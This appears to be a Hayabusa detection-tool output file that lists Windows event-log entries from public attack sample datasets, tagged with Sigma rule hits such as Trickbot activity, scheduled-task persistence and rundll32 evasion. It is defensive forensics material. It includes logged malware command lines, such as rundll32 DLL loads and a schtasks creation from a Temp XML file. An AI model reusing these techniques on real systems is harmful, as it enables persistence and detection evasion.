Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 747F3D96-659E-5F8F-0000-001064E03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-20 22:33:02.063 +00:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-20 22:33:02.064 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-20 22:33:02.064 +00:00,MSEDGEWIN10,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-20 22:35:26.755 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? 
| LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-23 21:55:59.769 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-23 21:57:29.217 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? 
| LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:34.745 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:34.767 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.014 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.332 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.399 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN 
DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task 
Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:07.601 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:17.176 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:17.176 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:17.543 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 
+2020-10-23 21:58:17.543 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:17.543 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:21.695 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:21.696 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 747F3D96-51FD-5F93-0000-00103B425E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:22.066 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: 
C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:22.364 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:22.391 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 13:15:50.672 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 13:53:41.949 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 13:53:43.173 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 14:25:16.281 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 14:25:17.595 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 15:07:57.551 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 15:07:57.815 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 20:37:35.394 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-27 10:17:18.369 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 10:17:18.369 +00:00,LAPTOP-JU4M3I0E,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 10:17:18.377 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 10:17:18.397 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 10:17:18.397 
+00:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-11-01 18:28:53.729 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:30:10.144 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:30:10.448 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:30:10.667 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:30:11.059 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:33:01.610 +00:00,MSEDGEWIN10,59,info,Evas | 
Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 10:55:56.114 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 10:59:25.802 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 10:59:51.480 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 11:03:04.083 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-11-05 11:03:05.093 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 11:03:06.197 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 12:31:12.664 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 12:31:12.941 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 12:33:21.719 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 15:25:28.955 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification 
Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 15:25:30.216 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 10:52:28.687 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 14:56:52.824 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-07 15:33:50.498 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-07 15:36:30.267 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: 
PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-07 15:36:30.760 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 08:25:00.043 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command 